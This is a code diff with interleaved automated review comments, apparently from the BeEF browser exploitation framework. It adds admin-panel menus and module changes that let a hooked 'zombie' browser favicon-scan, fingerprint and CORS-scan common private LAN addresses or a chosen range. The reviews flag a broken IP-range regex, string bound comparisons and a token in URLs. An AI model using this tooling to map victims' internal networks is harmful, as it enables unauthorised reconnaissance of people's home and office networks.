diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css
index 1acb3d86c..20d817c36 100644
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -108,6 +108,12 @@
background-repeat: no-repeat;
}
+.network-host-ctxMenu-web {
+ background-image: url(../images/icons/web.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
.network-host-ctxMenu-adapter {
background-image: url(../images/icons/adapter.png);
background-size: 16px 16px;
diff --git a/extensions/admin_ui/media/images/icons/web.png b/extensions/admin_ui/media/images/icons/web.png
new file mode 100644
index 000000000..fba0c645e
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/web.png differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
index b727db008..050dbd819 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
@@ -141,8 +141,170 @@ ZombieTab_Network = function(zombie) {
}
});
}
+ },{
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
}]
- });
+ });
emptygrid_menu.showAt(e.getXY());
},
rowcontextmenu: function(grid, rowIndex, e) {
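Review bot: The three 'Specify IP Range' handlers use the result of `prompt()` unchecked, so pressing Cancel leaves `ip_range` as null and the handler still posts `{"ipRange":null}` and shows a status such as 'Favicon scanning null for web servers...'. Add `if (ip_range === null || ip_range === '') { return; }` directly after each `prompt()` call. The six new handlers differ only in module name and status text, so one helper taking those values plus the range would remove the repetition. Each request also sets `async: false`, which blocks the admin UI until the server answers, and puts the API token in the query string (`"?token=" + token`), where it can end up in access and proxy logs. Sending the token in a request header would avoid that, if the REST API accepts one (not visible here).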
@@ -158,7 +320,8 @@ ZombieTab_Network = function(zombie) {
grid.rowCtxMenu = new Ext.menu.Menu({
items: [
{
- text: 'Discover HTTP',
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
@@ -166,7 +329,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("get_http_servers");
- commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
+ commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
@@ -188,7 +351,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("get_http_servers");
- commands_statusbar.update_sending('Scanning ' + ip_range + ' for HTTP servers...');
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
diff --git a/extensions/network/extension.rb b/extensions/network/extension.rb
index d3c4d17f7..f76877c19 100644
--- a/extensions/network/extension.rb
+++ b/extensions/network/extension.rb
@@ -11,7 +11,7 @@ module Network
@short_name = 'network'
@full_name = 'Network'
- @description = ''
+ @description = "This extension provides a simple interface for interacting with hosts on a zombie browser's local area networks."
end
end
diff --git a/modules/network/cross_origin_scanner/command.js b/modules/network/cross_origin_scanner/command.js
index 440c86b17..382dc5f17 100644
--- a/modules/network/cross_origin_scanner/command.js
+++ b/modules/network/cross_origin_scanner/command.js
@@ -16,22 +16,44 @@ beef.execute(function() {
return;
}
- // set target IP range
- var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
- if (range == null || range[1] == null) {
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
- return;
- }
-
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (var i = lowerBound; i <= upperBound; i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
+ // set target IP addresses
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (var i = lowerBound; i <= upperBound; i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
WorkerQueue = function(frequency) {
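Review bot: The range pattern is passed to `match()` as a quoted string, so the `\.` escapes are consumed by the string literal and every separator in the resulting regex matches any character. A constructed value such as `192x168x0x1-192x168x0x254` is therefore accepted as well-formed, even though the `split('.')` code below cannot parse it. Write the pattern as a regex literal (`/^…$/`) or double the backslashes (`'\\.'`); the same string is added in the get_http_servers and internal_network_fingerprinting hunks. The bounds are also kept as strings, so the first `i <= upperBound` test compares lexicographically and a range from .5 to .10 yields no addresses; parse them with `lowerBound = parseInt(ipBounds[0].split('.')[3], 10);` and likewise for `upperBound`. `ipBounds`, `lowerBound`, `upperBound` and `ipToTest` are assigned without `var` and become implicit globals.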
diff --git a/modules/network/cross_origin_scanner/config.yaml b/modules/network/cross_origin_scanner/config.yaml
index 7cedc2e37..204067d05 100644
--- a/modules/network/cross_origin_scanner/config.yaml
+++ b/modules/network/cross_origin_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Cross-Origin Scanner"
- description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF."
+ description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
# http://caniuse.com/cors
target:
diff --git a/modules/network/get_http_servers/command.js b/modules/network/get_http_servers/command.js
index a7a503c6a..c1e9eabfb 100644
--- a/modules/network/get_http_servers/command.js
+++ b/modules/network/get_http_servers/command.js
@@ -13,10 +13,36 @@ beef.execute(function() {
var timeout = "<%= @timeout %>";
var wait = "<%= @wait %>";
var threads = "<%= @threads %>";
- var urls = new Array('/favicon.ico', '/favicon.png');
+ var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');
// set target IP addresses
- if (ipRange != null){
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
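Review bot: The 16-entry 'common' address list and the range-validation expression added here are copies of the ones in cross_origin_scanner and internal_network_fingerprinting, so any correction has to be made in three files. Consider defining both once in shared client-side code and referencing them from each module, and comparing the sentinel with `ipRange === 'common'` rather than `==`. The hunk ends inside the `else` branch; the loop that consumes the range is outside it.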
diff --git a/modules/network/get_http_servers/config.yaml b/modules/network/get_http_servers/config.yaml
index dd167d867..7ef33d540 100644
--- a/modules/network/get_http_servers/config.yaml
+++ b/modules/network/get_http_servers/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Get HTTP Servers (Favicon)"
- description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon."
+ description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
target:
user_notify: ["FF", "IE", "C", "S"]
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index a11a03862..ba68105cc 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -17,19 +17,8 @@ beef.execute(function() {
ports = ports.split(',');
}
- // set target LAN IP addresses
- if (ipRange != null){
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (i=lowerBound;i<=upperBound;i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
- }
- } else {
+ // set target IP addresses
+ if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
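Review bot: Replacing the `ipRange != null` test with `ipRange == 'common'` changes what happens when no range is supplied. The default address list used to be the fallback; now any value other than the literal 'common' goes to the range branch added in the next hunk and is reported as malformed. If `ipRange` can be empty or absent for existing callers (its assignment is outside the hunk, so this is not certain), keep the fallback, e.g. `if (!ipRange || ipRange === 'common') {`. The config.yaml description documents the new keyword but not that an empty range is no longer accepted.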
@@ -49,6 +38,23 @@ beef.execute(function() {
'192.168.10.1',
'192.168.10.254'
];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (i=lowerBound;i<=upperBound;i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
/* Signatures in the form of:
diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml
index 77f6d75b4..34173741a 100644
--- a/modules/network/internal_network_fingerprinting/config.yaml
+++ b/modules/network/internal_network_fingerprinting/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Fingerprint Local Network"
- description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner."
+ description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C", "S"]